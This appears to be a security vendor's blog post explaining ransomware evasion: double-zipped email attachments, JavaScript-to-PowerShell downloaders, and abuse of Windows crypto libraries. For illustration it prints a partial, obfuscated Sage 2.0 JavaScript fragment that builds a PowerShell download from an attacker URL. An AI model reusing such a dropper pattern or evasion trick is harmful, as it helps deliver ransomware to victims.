Ransomware comes in many forms. One strategy commonly used in ransomware attacks is to cloak malicious actions within legitimate looking programs. This combination allows the ransomware to bypass existing security defenses and avoid detection. Some common techniques include:
Cloaking Ransomware in Double Zipped Files
This is an increasingly common technique, most recently used in the latest Sage ransomware campaign. The premise is simple: the attacker hides the launcher, which will pull down the ransomware in a zip file that is embedded inside another zip file. The zip file is sent as an e-mail attachment, when the victim opens the first zip file, there is simply another zip file. When the second zip file is uncompressed the malicious payload is presented to the victim.
The purpose of the double zip file is to avoid detection by systems that examine the contents of zipped files. Most of these security measures only examine a single level. So, the tool intercepts the zip file, decompresses it, sees that the uncompressed file is not malicious and allows the zip attachment to continue to the victim.
Using JavaScript & Powershell to Deliver Ransomware
Another common technique used by ransomware developers is to use legitimate tools to pull down and install ransomware. This has been used by the Locky, Cerber and Spora ransomware developers, amongst others. Again, using a malspam campaign as the delivery method the attacker will send a zipped attachment containing a JavaScript or PowerShell file.
When the victim opens the zipped file and clicks on the script, it will execute and pull down the ransomware. This technique is so effective because both JavaScript and PowerShell are legitimate tools engaged in, what appears to be on the surface, legitimate activity. This is the type of work that these scripting engines are designed to do. Because it is legitimate activity it won’t be detected by many security tools.
To understand how this works let’s take a look at a recent Sage 2.0 ransomware campaign that Brad posted to the SANS ISC InfoSec forum (https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959). One of the methods of attack was a JavaScript attachment. If the victim clicked on the attachment it performed several tasks, but the most important task is defined in two sections:
var uxqetefem = “”run””;
var ujepnehu = typeof window;
var ezqusa = undefined;
var vuglid = “”power”” + “”shell””;
var araze = 0;
This section of the script defined the variable vuglid as powershell, and later in the script:
var uphucnez = “”cmd.exe /c \”””” + vuglid + “” $eplir=’^System.Net.’;$wwopu=’^
Process; $’;$ijwirl=’^top/user.ph‘;$ahvetu=’^rt-Process ‘;$mhipmac=’^New-Object ‘;$hjuzxop=’^p?f=0.dat”,’;$cquza=’^temp+”\ejma’;$ocofdo=’^$path’;$eradq=’^e(”http://f‘;$vwekehn=’^pass -Scope’;$mivcad=’^DownloadFil’;$qjizych=’^$path);
This rather ugly mess tells the script to execute a command shell and run the variable vuglid, which was earlier defined as a powershell, and call out to a URL, defined elsewhere in the script, and pull down a file called 0.dat. In short, the JavaScript script invoked a PowerShell command to pull down a file from a malicious URL controlled by the attacker.
Of course, these are legitimate commands, so most security tools will allow them to run without examining the process. Which is why traditional security tools are not effective at detecting these types of attacks.
Encrypting the Data with Windows Crypto Libraries
Most people aren’t aware of this but ransomware families don’t develop their own crypt libraries, that would make the malware too cumbersome and less likely to install correctly. Instead, ransomware uses the built-in Windows Crypto Libraries and allows the victim’s system to handle the hard work of encrypting all those files.
Once again, calls to the Windows Crypto Libraries are normal, legitimate programs use the Windows API to make these calls all the time. What they don’t do is use the Windows API to attempt to encrypt many files simultaneously. While this behavior might go undetected by an anti-virus program, an advanced detection solution, such as Minerva can tell the difference between behavior that is normal and behavior that is malicious, even when using standard Windows calls.
Conclusion
Nowadays, malware developers take advantage of legitimate system features to cloak malware and remain undetected. Identifying such attacks is difficult as it is hard to distinguish between the legitimate use of those features and the malware’s manipulation of them.
This type of malware behavior emphasizes the need to prevent infection in the first place, rather than investing time in expensive and complex hunting and remediation processes.
Learn more about how to prevent evasive malware.
Purchase a copy of Ransomware Defending Against Digital Extortion by Allan Liska and Timothy Gallo